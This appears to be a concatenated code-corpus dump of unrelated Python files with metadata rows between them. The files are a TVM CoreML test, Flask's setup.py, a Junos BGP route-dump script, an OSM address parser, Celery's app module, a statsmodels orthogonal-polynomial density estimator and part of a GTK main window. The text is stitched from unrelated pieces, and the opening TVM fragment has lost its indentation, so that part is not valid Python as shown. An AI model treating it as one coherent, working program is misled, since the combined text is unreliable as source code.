mod = relay.transform.InferType()(mod)
# body
x = relay.var("x", shape=shape)
y = relay.var("y", shape=shape)
func = relay.Function([x, y], gv0(y) - gv2(x))
mod["main"] = func
mod = relay.transform.InferType()(mod)
return mod
def test_annotate():
mod = _create_graph()
mod = transform.AnnotateTarget("coremlcompiler")(mod)
mod = transform.PartitionGraph()(mod)
expected = _create_graph_annotated()
assert tvm.ir.structural_equal(mod, expected, map_free_vars=True)
@pytest.mark.skipif(not _has_xcode(), reason="Xcode is not available")
def test_compile_and_run():
ctx = tvm.cpu()
target = "llvm"
tol = 1e-3
with relay.build_config(opt_level=3):
lib = relay.build(_create_graph_annotated(), target=target)
m = tvm.contrib.graph_runtime.GraphModule(lib["default"](ctx))
shape = (10, 10)
x_data = np.random.rand(*shape).astype("float32")
y_data = np.random.rand(*shape).astype("float32")
m.set_input("x", x_data)
m.set_input("y", y_data)
m.run()
out = tvm.nd.empty(shape, ctx=ctx)
out = m.get_output(0, out)
expected = (y_data * y_data) - (x_data + x_data)
tvm.testing.assert_allclose(out.asnumpy(), expected, rtol=tol, atol=tol)
@mock.patch("tvm.contrib.coreml_runtime.create")
@mock.patch("tvm.contrib.xcode.compile_coreml")
def _construct_model(func, m1, m2):
mod = tvm.IRModule()
mod["main"] = func
mod = transform.AnnotateTarget("coremlcompiler")(mod)
mod = transform.PartitionGraph()(mod)
fcompile = tvm._ffi.get_global_func("relay.ext.coremlcompiler")
for var, func in mod.functions.items():
if func.attrs and "Compiler" in func.attrs and func.attrs["Compiler"] == "coremlcompiler":
fcompile(func)
def test_add():
shape = (10, 10)
x = relay.var("x", shape=shape)
y = x + x
func = relay.Function([x], y)
_construct_model(func)
def test_multiply():
shape = (10, 10)
x = relay.var("x", shape=shape)
y = x * x
func = relay.Function([x], y)
_construct_model(func)
def test_clip():
shape = (10, 10)
x = relay.var("x", shape=shape)
y = relay.clip(x, a_min=0.0, a_max=1.0)
func = relay.Function([x], y)
_construct_model(func)
def test_batch_flatten():
shape = (10, 10, 10)
x = relay.var("x", shape=shape)
y = relay.nn.batch_flatten(x)
func = relay.Function([x], y)
_construct_model(func)
def test_expand_dims():
shape = (10, 10)
x = relay.var("x", shape=shape)
y = relay.expand_dims(x, axis=0)
func = relay.Function([x], y)
_construct_model(func)
y = relay.expand_dims(x, axis=-1)
func = relay.Function([x], y)
_construct_model(func)
def test_relu():
shape = (10, 10)
x = relay.var("x", shape=shape)
y = relay.nn.relu(x)
func = relay.Function([x], y)
_construct_model(func)
def test_softmax():
shape = (10, 10)
x = relay.var("x", shape=shape)
y = relay.nn.softmax(x, axis=1)
func = relay.Function([x], y)
_construct_model(func)
def test_conv2d():
x = relay.var("x", shape=(1, 3, 224, 224))
w = relay.const(np.zeros((16, 3, 3, 3), dtype="float32"))
y = relay.nn.conv2d(x, w, strides=[2, 2], padding=[1, 1, 1, 1], kernel_size=[3, 3])
func = relay.Function([x], y)
_construct_model(func)
def test_global_avg_pool2d():
shape = (10, 10, 10, 10)
x = relay.var("x", shape=shape)
y = relay.nn.global_avg_pool2d(x)
func = relay.Function([x], y)
_construct_model(func)
if __name__ == "__main__":
test_annotate()
test_compile_and_run()
test_add()
test_multiply()
test_clip()
test_expand_dims()
test_relu()
test_batch_flatten()
test_softmax()
test_conv2d()
test_global_avg_pool2d()
| apache-2.0 | 1,426,598,191,818,227,700 | 26.243363 | 98 | 0.626117 | false |
abhishekgahlot/flask | setup.py | 9 | 3041 | """
Flask
-----
Flask is a microframework for Python based on Werkzeug, Jinja 2 and good
intentions. And before you ask: It's BSD licensed!
Flask is Fun
````````````
.. code:: python
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
if __name__ == "__main__":
app.run()
And Easy to Setup
`````````````````
.. code:: bash
$ pip install Flask
$ python hello.py
* Running on http://localhost:5000/
Links
`````
* `website <http://flask.pocoo.org/>`_
* `documentation <http://flask.pocoo.org/docs/>`_
* `development version
<http://github.com/mitsuhiko/flask/zipball/master#egg=Flask-dev>`_
"""
from __future__ import print_function
from setuptools import Command, setup
class run_audit(Command):
"""Audits source code using PyFlakes for following issues:
- Names which are used but not defined or used before they are defined.
- Names which are redefined without having been used.
"""
description = "Audit source code with PyFlakes"
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
import os, sys
try:
import pyflakes.scripts.pyflakes as flakes
except ImportError:
print("Audit requires PyFlakes installed in your system.")
sys.exit(-1)
warns = 0
# Define top-level directories
dirs = ('flask', 'examples', 'scripts')
for dir in dirs:
for root, _, files in os.walk(dir):
for file in files:
if file != '__init__.py' and file.endswith('.py') :
warns += flakes.checkPath(os.path.join(root, file))
if warns > 0:
print("Audit finished with total %d warnings." % warns)
else:
print("No problems found in sourcecode.")
setup(
name='Flask',
version='0.11-dev',
url='http://github.com/mitsuhiko/flask/',
license='BSD',
author='Armin Ronacher',
author_email='[email protected]',
description='A microframework based on Werkzeug, Jinja2 '
'and good intentions',
long_description=__doc__,
packages=['flask', 'flask.ext', 'flask.testsuite'],
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=[
'Werkzeug>=0.7',
'Jinja2>=2.4',
'itsdangerous>=0.21'
],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
],
cmdclass={'audit': run_audit},
test_suite='flask.testsuite.suite'
)
| bsd-3-clause | 4,386,557,360,297,393,000 | 26.396396 | 79 | 0.585663 | false |
job/pypeer | bin/get_routes_from_session.py | 2 | 1560 | #!/usr/bin/env python
import argparse
import sys
from lxml import etree
sys.path.append('./lib')
from jnpr.junos import Device
from pypeer.ConfigDictionary import ConfigDictionary
from pypeer.RouteData import RouteData
def main(device_ip, peer_ip):
config = ConfigDictionary()
username = config.username()
password = config.password()
print (device_ip + " logging in as " + username)
jdev = Device(user=username, host=device_ip, password=password)
jdev.open(gather_facts=False)
jdev.timeout = 6000
try:
resultxml = jdev.rpc.get_route_information(table='inet.0',
protocol='bgp',
peer=peer_ip,
extensive=True)
except Exception as err:
print "CMD:"
etree.dump(err.cmd)
print "RSP:"
etree.dump(err.rsp)
for routexml in resultxml.findall('.//rt'):
route = RouteData(routexml)
print "destination: " + route.prefix() + "as-path: " + route.aspath()
jdev.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Dump a routing table as offered by a BGP neighbo(u)r')
parser.add_argument('--ipaddr', dest='ipaddr', help='bgp router ip address', required=True)
parser.add_argument('--bgppeer', dest='bgppeer', help='bgp peer address', required=True)
args = parser.parse_args()
device_ip = args.ipaddr
peer_ip = args.bgppeer
main(device_ip, peer_ip)
| mit | -1,282,931,392,251,232,000 | 27.363636 | 104 | 0.6 | false |
simgislab/osm-geocode | address_parser.py | 1 | 2655 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import sys
import locale
try:
from osgeo import ogr, osr, gdal
except ImportError:
import ogr, osr, gdal
#global vars
_fs_encoding = sys.getfilesystemencoding()
_message_encoding = locale.getdefaultlocale()[1]
class AddressParser():
def parse(self, sqlite_file):
drv = ogr.GetDriverByName("SQLite")
gdal.ErrorReset()
data_source = drv.Open(sqlite_file.encode('utf-8'), True)
if data_source is None:
self.__show_err("SQLite file can't be opened!\n" + unicode(gdal.GetLastErrorMsg(), _message_encoding))
return
#setup fast writing
sql_lyr = data_source.ExecuteSQL('PRAGMA journal_mode=OFF')
if sql_lyr is not None:
data_source.ReleaseResultSet(sql_lyr)
sql_lyr = data_source.ExecuteSQL('PRAGMA synchronous=0')
if sql_lyr is not None:
data_source.ReleaseResultSet(sql_lyr)
sql_lyr = data_source.ExecuteSQL('PRAGMA cache_size=100000')
if sql_lyr is not None:
data_source.ReleaseResultSet(sql_lyr)
layer = data_source[0]
all_feats = []
layer.ResetReading()
feat = layer.GetNextFeature()
while feat is not None:
all_feats.append(feat)
feat = layer.GetNextFeature()
for feat in all_feats:
addr = feat['addr_v']
if not addr:
continue
addr = unicode(addr, 'utf-8').replace(u'п.', '').replace(u'с.', '').replace(u'г.', '').strip()
addr = addr.replace(u'ул.', '').replace(u'пр.', '').replace(u'пр-т', '').replace(u'пер.', '').strip()
addr = addr.replace(u'д.', '').replace(u'дом', '').strip()
feat.SetField("g_addr", addr.encode('utf-8'))
if layer.SetFeature(feat) != 0:
print 'Failed to update feature.'
#close DS's
data_source.Destroy()
def __show_err(self, msg):
print "Error: " + msg
| gpl-2.0 | 1,332,626,209,184,329,700 | 36.685714 | 114 | 0.50417 | false |
johankaito/fufuka | microblog/flask/venv/lib/python2.7/site-packages/celery/app/__init__.py | 6 | 4380 | # -*- coding: utf-8 -*-
"""
celery.app
~~~~~~~~~~
Celery Application.
"""
from __future__ import absolute_import
import os
from celery.local import Proxy
from celery import _state
from celery._state import (
get_current_app as current_app,
get_current_task as current_task,
connect_on_app_finalize, set_default_app, _get_active_apps, _task_stack,
)
from celery.utils import gen_task_name
from .base import Celery, AppPickler
__all__ = ['Celery', 'AppPickler', 'default_app', 'app_or_default',
'bugreport', 'enable_trace', 'disable_trace', 'shared_task',
'set_default_app', 'current_app', 'current_task',
'push_current_task', 'pop_current_task']
#: Proxy always returning the app set as default.
default_app = Proxy(lambda: _state.default_app)
#: Function returning the app provided or the default app if none.
#:
#: The environment variable :envvar:`CELERY_TRACE_APP` is used to
#: trace app leaks. When enabled an exception is raised if there
#: is no active app.
app_or_default = None
#: The 'default' loader is the default loader used by old applications.
#: This is deprecated and should no longer be used as it's set too early
#: to be affected by --loader argument.
default_loader = os.environ.get('CELERY_LOADER') or 'default' # XXX
#: Function used to push a task to the thread local stack
#: keeping track of the currently executing task.
#: You must remember to pop the task after.
push_current_task = _task_stack.push
#: Function used to pop a task from the thread local stack
#: keeping track of the currently executing task.
pop_current_task = _task_stack.pop
def bugreport(app=None):
return (app or current_app()).bugreport()
def _app_or_default(app=None):
if app is None:
return _state.get_current_app()
return app
def _app_or_default_trace(app=None): # pragma: no cover
from traceback import print_stack
from billiard import current_process
if app is None:
if getattr(_state._tls, 'current_app', None):
print('-- RETURNING TO CURRENT APP --') # noqa+
print_stack()
return _state._tls.current_app
if current_process()._name == 'MainProcess':
raise Exception('DEFAULT APP')
print('-- RETURNING TO DEFAULT APP --') # noqa+
print_stack()
return _state.default_app
return app
def enable_trace():
global app_or_default
app_or_default = _app_or_default_trace
def disable_trace():
global app_or_default
app_or_default = _app_or_default
if os.environ.get('CELERY_TRACE_APP'): # pragma: no cover
enable_trace()
else:
disable_trace()
App = Celery # XXX Compat
def shared_task(*args, **kwargs):
"""Create shared tasks (decorator).
Will return a proxy that always takes the task from the current apps
task registry.
This can be used by library authors to create tasks that will work
for any app environment.
Example:
>>> from celery import Celery, shared_task
>>> @shared_task
... def add(x, y):
... return x + y
>>> app1 = Celery(broker='amqp://')
>>> add.app is app1
True
>>> app2 = Celery(broker='redis://')
>>> add.app is app2
"""
def create_shared_task(**options):
def __inner(fun):
name = options.get('name')
# Set as shared task so that unfinalized apps,
# and future apps will load the task.
connect_on_app_finalize(
lambda app: app._task_from_fun(fun, **options)
)
# Force all finalized apps to take this task as well.
for app in _get_active_apps():
if app.finalized:
with app._finalize_mutex:
app._task_from_fun(fun, **options)
# Return a proxy that always gets the task from the current
# apps task registry.
def task_by_cons():
app = current_app()
return app.tasks[
name or gen_task_name(app, fun.__name__, fun.__module__)
]
return Proxy(task_by_cons)
return __inner
if len(args) == 1 and callable(args[0]):
return create_shared_task(**kwargs)(args[0])
return create_shared_task(*args, **kwargs)
| apache-2.0 | -3,282,554,475,946,911,000 | 28.2 | 76 | 0.612329 | false |
yarikoptic/pystatsmodels | statsmodels/sandbox/nonparametric/densityorthopoly.py | 3 | 17839 | # -*- coding: cp1252 -*-
# some cut and paste characters are not ASCII
'''density estimation based on orthogonal polynomials
Author: Josef Perktold
Created: 2011-05017
License: BSD
2 versions work: based on Fourier, FPoly, and chebychev T, ChebyTPoly
also hermite polynomials, HPoly, works
other versions need normalization
TODO:
* check fourier case again: base is orthonormal,
but needs offsetfact = 0 and doesn't integrate to 1, rescaled looks good
* hermite: works but DensityOrthoPoly requires currently finite bounds
I use it with offsettfactor 0.5 in example
* not implemented methods:
- add bonafide density correction
- add transformation to domain of polynomial base - DONE
possible problem: what is the behavior at the boundary,
offsetfact requires more work, check different cases, add as option
moved to polynomial class by default, as attribute
* convert examples to test cases
* need examples with large density on boundary, beta ?
* organize poly classes in separate module, check new numpy.polynomials,
polyvander
* MISE measures, order selection, ...
enhancements:
* other polynomial bases: especially for open and half open support
* wavelets
* local or piecewise approximations
'''
from scipy import stats, integrate
import numpy as np
sqr2 = np.sqrt(2.)
class FPoly(object):
'''Orthonormal (for weight=1) Fourier Polynomial on [0,1]
orthonormal polynomial but density needs corfactor that I don't see what
it is analytically
parameterization on [0,1] from
Sam Efromovich: Orthogonal series density estimation,
2010 John Wiley & Sons, Inc. WIREs Comp Stat 2010 2 467476
'''
def __init__(self, order):
self.order = order
self.domain = (0, 1)
self.intdomain = self.domain
def __call__(self, x):
if self.order == 0:
return np.ones_like(x)
else:
return sqr2 * np.cos(np.pi * self.order * x)
class F2Poly(object):
'''Orthogonal (for weight=1) Fourier Polynomial on [0,pi]
is orthogonal but first component doesn't square-integrate to 1
final result seems to need a correction factor of sqrt(pi)
_corfactor = sqrt(pi) from integrating the density
Parameterization on [0, pi] from
Peter Hall, Cross-Validation and the Smoothing of Orthogonal Series Density
Estimators, JOURNAL OF MULTIVARIATE ANALYSIS 21, 189-206 (1987)
'''
def __init__(self, order):
self.order = order
self.domain = (0, np.pi)
self.intdomain = self.domain
self.offsetfactor = 0
def __call__(self, x):
if self.order == 0:
return np.ones_like(x) / np.sqrt(np.pi)
else:
return sqr2 * np.cos(self.order * x) / np.sqrt(np.pi)
class ChebyTPoly(object):
'''Orthonormal (for weight=1) Chebychev Polynomial on (-1,1)
Notes
-----
integration requires to stay away from boundary, offsetfactor > 0
maybe this implies that we cannot use it for densities that are > 0 at
boundary ???
or maybe there is a mistake close to the boundary, sometimes integration works.
'''
def __init__(self, order):
self.order = order
from scipy.special import chebyt
self.poly = chebyt(order)
self.domain = (-1, 1)
self.intdomain = (-1+1e-6, 1-1e-6)
#not sure if I need this, in integration nans are possible on the boundary
self.offsetfactor = 0.01 #required for integration
def __call__(self, x):
if self.order == 0:
return np.ones_like(x) / (1-x**2)**(1/4.) /np.sqrt(np.pi)
else:
return self.poly(x) / (1-x**2)**(1/4.) /np.sqrt(np.pi) *np.sqrt(2)
from scipy.misc import factorial
from scipy import special
logpi2 = np.log(np.pi)/2
class HPoly(object):
'''Orthonormal (for weight=1) Hermite Polynomial, uses finite bounds
for current use with DensityOrthoPoly domain is defined as [-6,6]
'''
def __init__(self, order):
self.order = order
from scipy.special import hermite
self.poly = hermite(order)
self.domain = (-6, +6)
self.offsetfactor = 0.5 # note this is
def __call__(self, x):
k = self.order
lnfact = -(1./2)*(k*np.log(2.) + special.gammaln(k+1) + logpi2) - x*x/2
fact = np.exp(lnfact)
return self.poly(x) * fact
def polyvander(x, polybase, order=5):
polyarr = np.column_stack([polybase(i)(x) for i in range(order)])
return polyarr
def inner_cont(polys, lower, upper, weight=None):
'''inner product of continuous function (with weight=1)
Parameters
----------
polys : list of callables
polynomial instances
lower : float
lower integration limit
upper : float
upper integration limit
weight : callable or None
weighting function
Returns
-------
innp : ndarray
symmetric 2d square array with innerproduct of all function pairs
err : ndarray
numerical error estimate from scipy.integrate.quad, same dimension as innp
Examples
--------
>>> from scipy.special import chebyt
>>> polys = [chebyt(i) for i in range(4)]
>>> r, e = inner_cont(polys, -1, 1)
>>> r
array([[ 2. , 0. , -0.66666667, 0. ],
[ 0. , 0.66666667, 0. , -0.4 ],
[-0.66666667, 0. , 0.93333333, 0. ],
[ 0. , -0.4 , 0. , 0.97142857]])
'''
n_polys = len(polys)
innerprod = np.empty((n_polys, n_polys))
innerprod.fill(np.nan)
interr = np.zeros((n_polys, n_polys))
for i in range(n_polys):
for j in range(i+1):
p1 = polys[i]
p2 = polys[j]
if not weight is None:
innp, err = integrate.quad(lambda x: p1(x)*p2(x)*weight(x),
lower, upper)
else:
innp, err = integrate.quad(lambda x: p1(x)*p2(x), lower, upper)
innerprod[i,j] = innp
interr[i,j] = err
if not i == j:
innerprod[j,i] = innp
interr[j,i] = err
return innerprod, interr
def is_orthonormal_cont(polys, lower, upper, rtol=0, atol=1e-08):
'''check whether functions are orthonormal
Parameters
----------
polys : list of polynomials or function
Returns
-------
is_orthonormal : bool
is False if the innerproducts are not close to 0 or 1
Notes
-----
this stops as soon as the first deviation from orthonormality is found.
Examples
--------
>>> from scipy.special import chebyt
>>> polys = [chebyt(i) for i in range(4)]
>>> r, e = inner_cont(polys, -1, 1)
>>> r
array([[ 2. , 0. , -0.66666667, 0. ],
[ 0. , 0.66666667, 0. , -0.4 ],
[-0.66666667, 0. , 0.93333333, 0. ],
[ 0. , -0.4 , 0. , 0.97142857]])
>>> is_orthonormal_cont(polys, -1, 1, atol=1e-6)
False
>>> polys = [ChebyTPoly(i) for i in range(4)]
>>> r, e = inner_cont(polys, -1, 1)
>>> r
array([[ 1.00000000e+00, 0.00000000e+00, -9.31270888e-14,
0.00000000e+00],
[ 0.00000000e+00, 1.00000000e+00, 0.00000000e+00,
-9.47850712e-15],
[ -9.31270888e-14, 0.00000000e+00, 1.00000000e+00,
0.00000000e+00],
[ 0.00000000e+00, -9.47850712e-15, 0.00000000e+00,
1.00000000e+00]])
>>> is_orthonormal_cont(polys, -1, 1, atol=1e-6)
True
'''
for i in range(len(polys)):
for j in range(i+1):
p1 = polys[i]
p2 = polys[j]
innerprod = integrate.quad(lambda x: p1(x)*p2(x), lower, upper)[0]
#print i,j, innerprod
if not np.allclose(innerprod, i==j, rtol=rtol, atol=atol):
return False
return True
#new versions
class DensityOrthoPoly(object):
'''Univariate density estimation by orthonormal series expansion
Uses an orthonormal polynomial basis to approximate a univariate density.
currently all arguments can be given to fit, I might change it to requiring
arguments in __init__ instead.
'''
def __init__(self, polybase=None, order=5):
if not polybase is None:
self.polybase = polybase
self.polys = polys = [polybase(i) for i in range(order)]
#try:
#self.offsetfac = 0.05
#self.offsetfac = polys[0].offsetfactor #polys maybe not defined yet
self._corfactor = 1
self._corshift = 0
def fit(self, x, polybase=None, order=5, limits=None):
'''estimate the orthogonal polynomial approximation to the density
'''
if polybase is None:
polys = self.polys[:order]
else:
self.polybase = polybase
self.polys = polys = [polybase(i) for i in range(order)]
#move to init ?
if not hasattr(self, 'offsetfac'):
self.offsetfac = polys[0].offsetfactor
xmin, xmax = x.min(), x.max()
if limits is None:
self.offset = offset = (xmax - xmin) * self.offsetfac
limits = self.limits = (xmin - offset, xmax + offset)
interval_length = limits[1] - limits[0]
xinterval = xmax - xmin
# need to cover (half-)open intervalls
self.shrink = 1. / interval_length #xinterval/interval_length
offset = (interval_length - xinterval ) / 2.
self.shift = xmin - offset
self.x = x = self._transform(x)
coeffs = [(p(x)).mean() for p in polys]
self.coeffs = coeffs
self.polys = polys
self._verify() #verify that it is a proper density
return self #coeffs, polys
def evaluate(self, xeval, order=None):
xeval = self._transform(xeval)
if order is None:
order = len(self.polys)
res = sum(c*p(xeval) for c, p in zip(self.coeffs, self.polys)[:order])
res = self._correction(res)
return res
def __call__(self, xeval):
'''alias for evaluate, except no order argument'''
return self.evaluate(xeval)
def _verify(self):
'''check for bona fide density correction
currently only checks that density integrates to 1
` non-negativity - NotImplementedYet
'''
#watch out for circular/recursive usage
#evaluate uses domain of data, we stay offset away from bounds
intdomain = self.limits #self.polys[0].intdomain
self._corfactor = 1./integrate.quad(self.evaluate, *intdomain)[0]
#self._corshift = 0
#self._corfactor
return self._corfactor
def _correction(self, x):
'''bona fide density correction
affine shift of density to make it into a proper density
'''
if self._corfactor != 1:
x *= self._corfactor
if self._corshift != 0:
x += self._corshift
return x
def _transform(self, x): # limits=None):
'''transform observation to the domain of the density
uses shrink and shift attribute which are set in fit to stay
'''
#use domain from first instance
#class doesn't have domain self.polybase.domain[0] AttributeError
domain = self.polys[0].domain
ilen = (domain[1] - domain[0])
shift = self.shift - domain[0]/self.shrink/ilen
shrink = self.shrink * ilen
return (x - shift) * shrink
#old version as a simple function
def density_orthopoly(x, polybase, order=5, xeval=None):
from scipy.special import legendre, hermitenorm, chebyt, chebyu, hermite
#polybase = legendre #chebyt #hermitenorm#
#polybase = chebyt
#polybase = FPoly
#polybase = ChtPoly
#polybase = hermite
#polybase = HPoly
if xeval is None:
xeval = np.linspace(x.min(),x.max(),50)
#polys = [legendre(i) for i in range(order)]
polys = [polybase(i) for i in range(order)]
#coeffs = [(p(x)*(1-x**2)**(-1/2.)).mean() for p in polys]
#coeffs = [(p(x)*np.exp(-x*x)).mean() for p in polys]
coeffs = [(p(x)).mean() for p in polys]
res = sum(c*p(xeval) for c, p in zip(coeffs, polys))
#res *= (1-xeval**2)**(-1/2.)
#res *= np.exp(-xeval**2./2)
return res, xeval, coeffs, polys
if __name__ == '__main__':
examples = ['chebyt', 'fourier', 'hermite']#[2]
nobs = 10000
import matplotlib.pyplot as plt
from statsmodels.sandbox.distributions.mixture_rvs import (
mixture_rvs, MixtureDistribution)
#np.random.seed(12345)
## obs_dist = mixture_rvs([1/3.,2/3.], size=nobs, dist=[stats.norm, stats.norm],
## kwargs = (dict(loc=-1,scale=.5),dict(loc=1,scale=.75)))
mix_kwds = (dict(loc=-0.5,scale=.5),dict(loc=1,scale=.2))
obs_dist = mixture_rvs([1/3.,2/3.], size=nobs, dist=[stats.norm, stats.norm],
kwargs=mix_kwds)
mix = MixtureDistribution()
#obs_dist = np.random.randn(nobs)/4. #np.sqrt(2)
if "chebyt_" in examples: # needed for Cheby example below
#obs_dist = np.clip(obs_dist, -2, 2)/2.01
#chebyt [0,1]
obs_dist = obs_dist[(obs_dist>-2) & (obs_dist<2)]/2.0 #/4. + 2/4.0
#fourier [0,1]
#obs_dist = obs_dist[(obs_dist>-2) & (obs_dist<2)]/4. + 2/4.0
f_hat, grid, coeffs, polys = density_orthopoly(obs_dist, ChebyTPoly, order=20, xeval=None)
#f_hat /= f_hat.sum() * (grid.max() - grid.min())/len(grid)
f_hat0 = f_hat
from scipy import integrate
fint = integrate.trapz(f_hat, grid)# dx=(grid.max() - grid.min())/len(grid))
#f_hat -= fint/2.
print 'f_hat.min()', f_hat.min()
f_hat = (f_hat - f_hat.min()) #/ f_hat.max() - f_hat.min
fint2 = integrate.trapz(f_hat, grid)# dx=(grid.max() - grid.min())/len(grid))
print 'fint2', fint, fint2
f_hat /= fint2
# note that this uses a *huge* grid by default
#f_hat, grid = kdensityfft(emp_dist, kernel="gauss", bw="scott")
# check the plot
doplot = 0
if doplot:
plt.hist(obs_dist, bins=50, normed=True, color='red')
plt.plot(grid, f_hat, lw=2, color='black')
plt.plot(grid, f_hat0, lw=2, color='g')
plt.show()
for i,p in enumerate(polys[:5]):
for j,p2 in enumerate(polys[:5]):
print i,j,integrate.quad(lambda x: p(x)*p2(x), -1,1)[0]
for p in polys:
print integrate.quad(lambda x: p(x)**2, -1,1)
#examples using the new class
if "chebyt" in examples:
dop = DensityOrthoPoly().fit(obs_dist, ChebyTPoly, order=20)
grid = np.linspace(obs_dist.min(), obs_dist.max())
xf = dop(grid)
#print 'np.max(np.abs(xf - f_hat0))', np.max(np.abs(xf - f_hat0))
dopint = integrate.quad(dop, *dop.limits)[0]
print 'dop F integral', dopint
mpdf = mix.pdf(grid, [1/3.,2/3.], dist=[stats.norm, stats.norm],
kwargs=mix_kwds)
doplot = 1
if doplot:
plt.figure()
plt.hist(obs_dist, bins=50, normed=True, color='red')
plt.plot(grid, xf, lw=2, color='black')
plt.plot(grid, mpdf, lw=2, color='green')
plt.title('using Chebychev polynomials')
#plt.show()
if "fourier" in examples:
dop = DensityOrthoPoly()
dop.offsetfac = 0.5
dop = dop.fit(obs_dist, F2Poly, order=30)
grid = np.linspace(obs_dist.min(), obs_dist.max())
xf = dop(grid)
#print np.max(np.abs(xf - f_hat0))
dopint = integrate.quad(dop, *dop.limits)[0]
print 'dop F integral', dopint
mpdf = mix.pdf(grid, [1/3.,2/3.], dist=[stats.norm, stats.norm],
kwargs=mix_kwds)
doplot = 1
if doplot:
plt.figure()
plt.hist(obs_dist, bins=50, normed=True, color='red')
plt.title('using Fourier polynomials')
plt.plot(grid, xf, lw=2, color='black')
plt.plot(grid, mpdf, lw=2, color='green')
#plt.show()
#check orthonormality:
print np.max(np.abs(inner_cont(dop.polys[:5], 0, 1)[0] -np.eye(5)))
if "hermite" in examples:
dop = DensityOrthoPoly()
dop.offsetfac = 0
dop = dop.fit(obs_dist, HPoly, order=20)
grid = np.linspace(obs_dist.min(), obs_dist.max())
xf = dop(grid)
#print np.max(np.abs(xf - f_hat0))
dopint = integrate.quad(dop, *dop.limits)[0]
print 'dop F integral', dopint
mpdf = mix.pdf(grid, [1/3.,2/3.], dist=[stats.norm, stats.norm],
kwargs=mix_kwds)
doplot = 1
if doplot:
plt.figure()
plt.hist(obs_dist, bins=50, normed=True, color='red')
plt.plot(grid, xf, lw=2, color='black')
plt.plot(grid, mpdf, lw=2, color='green')
plt.title('using Hermite polynomials')
plt.show()
#check orthonormality:
print np.max(np.abs(inner_cont(dop.polys[:5], 0, 1)[0] -np.eye(5)))
#check orthonormality
hpolys = [HPoly(i) for i in range(5)]
inn = inner_cont(hpolys, -6, 6)[0]
print np.max(np.abs(inn - np.eye(5)))
print (inn*100000).astype(int)
from scipy.special import hermite, chebyt
htpolys = [hermite(i) for i in range(5)]
innt = inner_cont(htpolys, -10, 10)[0]
print (innt*100000).astype(int)
polysc = [chebyt(i) for i in range(4)]
r, e = inner_cont(polysc, -1, 1, weight=lambda x: (1-x*x)**(-1/2.))
print np.max(np.abs(r - np.diag(np.diag(r))))
| bsd-3-clause | -6,597,284,244,583,072,000 | 30.351494 | 98 | 0.572958 | false |
benjaoming/lcrs | lcrs/master/ui/mainwindow.py | 2 | 7625 | # -*- coding: utf-8 -*-
#
# LCRS Copyright (C) 2009-2011
# - Benjamin Bach
#
# LCRS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# LCRS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with LCRS. If not, see <http://www.gnu.org/licenses/>.
import gobject, gtk
import os
from lcrs.master.ui.grouppage import GroupPage
from lcrs.master import config_master
from lcrs.master.ui.preferenceswindow import PreferencesWindow
import logging
logger = logging.getLogger('lcrs')
# should be replaced with something from logging module
LOG_ERR, LOG_WARNING, LOG_INFO = range(3)
class MainWindow():
"""
Main class for application window.
REMEMBER THREAD SAFETY!!
"""
def __init__(self, *args, **kwargs):
self.groups = {}
self.computers = {}
self.log = []
self.plugin_hooks = {}
self.plugins = []
self.alive = True
self.master_instance = kwargs['master_instance']
self.config = self.master_instance.get_config()
for plugin_class, options in config_master.ui_plugins.items():
if not options.get('disabled', False):
p = plugin_class(self, self.config)
self.plugins.append(p)
p.activate()
logger.debug("activating %s" % plugin_class.name)
self.glade = gtk.Builder()
self.glade.add_from_file(
os.path.join(config_master.MASTER_PATH, 'ui/glade/mainwindow.glade')
)
self.groupNotebook = self.getWidget('groupNotebook')
self.groupNotebook.remove(self.getWidget('groupPage'))
win = self.getWidget('mainWindow')
win.connect("delete-event", self.on_delete_event)
menu_preferences = self.getWidget('menuitempreferences')
menu_preferences.connect('activate', self.open_preferences)
self.glade.connect_signals(self)
self.getWidget('buttonAddGroup').connect('clicked', self.add_group)
self.win = win
self.win.show()
self.update_overall_status()
self.alert_plugins('on-mainwindow-ready')
def plugin_subscribe(self, hook_id, callback):
old_list = self.plugin_hooks.get(hook_id, [])
old_list.append(callback)
self.plugin_hooks[hook_id] = old_list
def alert_plugins(self, event, *args):
"""We only return a single value, even if there are more than
One plugin. Anything else seems overkill.
"""
return_value = None
for plugin_func in self.plugin_hooks.get(event, []):
return_value = plugin_func(*args)
return return_value
def show(self):
self.win.show()
def on_delete_event(self, *args):
"""
Display manager closed window.
"""
self.main_quit()
return True # Do not destroy
def on_log_menu_activate(self, *args):
f = open(config_master.LOG_FILE, "r")
textbuffer = self.getWidget('textbufferLog')
textbuffer.set_text(f.read())
self.dialog = self.getWidget('dialogLog')
self.dialog.show_all()
self.dialog.connect('delete_event', self.dialog.hide_on_delete)
def on_log_close(self, *args):
self.dialog.hide()
def main_quit(self):
def do_quit(dialog, response_id):
if dialog:
dialog.destroy()
if not response_id == gtk.RESPONSE_YES: return
self.alive = False
self.win.destroy()
gtk.main_quit()
dialog = gtk.MessageDialog(parent=self.win,
type=gtk.MESSAGE_QUESTION,
buttons = gtk.BUTTONS_YES_NO,
message_format="Do you really want to quit LCRS?")
dialog.connect("response", do_quit)
dialog.connect("close", do_quit, gtk.RESPONSE_NO)
dialog.show()
def getWidget(self, identifier):
return self.glade.get_object(identifier)
def _update_overall_status(self):
no_computers = 0
for g in self.groups.keys():
no_computers = no_computers + len(g.computers)
busy_computers = []
for g in self.groups.keys():
busy_computers += filter(lambda c: c.is_active(), g.computers)
finished_computers = []
for g in self.groups.keys():
